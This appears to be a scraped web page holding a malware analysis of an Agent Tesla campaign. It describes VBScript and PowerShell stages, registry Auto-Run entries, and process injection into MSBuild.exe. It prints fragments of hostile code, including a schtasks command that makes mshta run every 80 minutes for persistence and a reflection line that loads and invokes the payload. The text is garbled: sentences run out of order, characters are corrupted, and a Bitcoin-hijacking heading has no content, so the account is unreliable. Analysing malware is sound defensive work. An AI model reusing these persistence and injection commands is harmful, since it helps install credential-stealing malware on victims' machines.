![]() ![]() Hijacking a Bitcoin address on the victim’s deviceĪfter being decoded, we then obtained the second piece of VBScript code. n "schtasks /create /sc MINUTE /mo 80 /tn \"WIND0WSUPLATE\" /F /tr \"MsHtA\" 27.html\"" ,0Ģ. Its action is to execute command “mshta and it’s called every 80 minutes. ![]() It creates a WMI (Windows Management Instrumentation) Object to add into the Auto-Run group by calling its function “SetStringValue()”.īesides adding items into the Auto-Run group, it adds a scheduled task in “Task Scheduler” to make the entire campaign work effectively.īelow is the code used to run “schtasks” to create a new scheduled task. The VBScript code adds numerous items into the Auto-Run group in the system registryįigure 3.2 shows a screenshot of the Auto-Run group in the system registry of an infected system.This means Agent Tesla will run within “MSBuild.exe”-which is also a way to protect Agent Tesla from being detected by the victim. It runs a normal EXE file (“MSBuild.exe”), then deploys the new Agent Tesla variant stored in the huge array $Cli444 into it and executes. ::Load($Cli555).GetType('WpfControlLibrary1.LOGO').GetMethod('Run').Invoke($null,] ('C:\Windows\Microsoft.NET\Framework\v9\MSBuild.exe',$Cli444)) Īs you can see, it loads the loader from the array $Cli555, which has a function called “()” requiring two parameters. Below is a segment of code extracted from “27-1.txt” as an example to explain how it loads Agent Tesla. The two EXE files are a loader of Agent Tesla and a new variant of Agent Tesla. There are two EXE files stored in two huge arrays inside each downloaded PowerShell file. It then runs PowerShell to execute three PowerShell files downloaded from three URLs. It calls the VBScript method MicrosoftWINdows.Run() with the following parameter. Downloads PowerShell files to deliver the new Agent Tesla variant.This content contains a piece of VBScript code that performs the three tasks shown below: After calling unescape() twice to the first segment of VBScript code, we finally obtain HTML content, as shown in figure 3.1. ![]()
0 Comments
Leave a Reply. |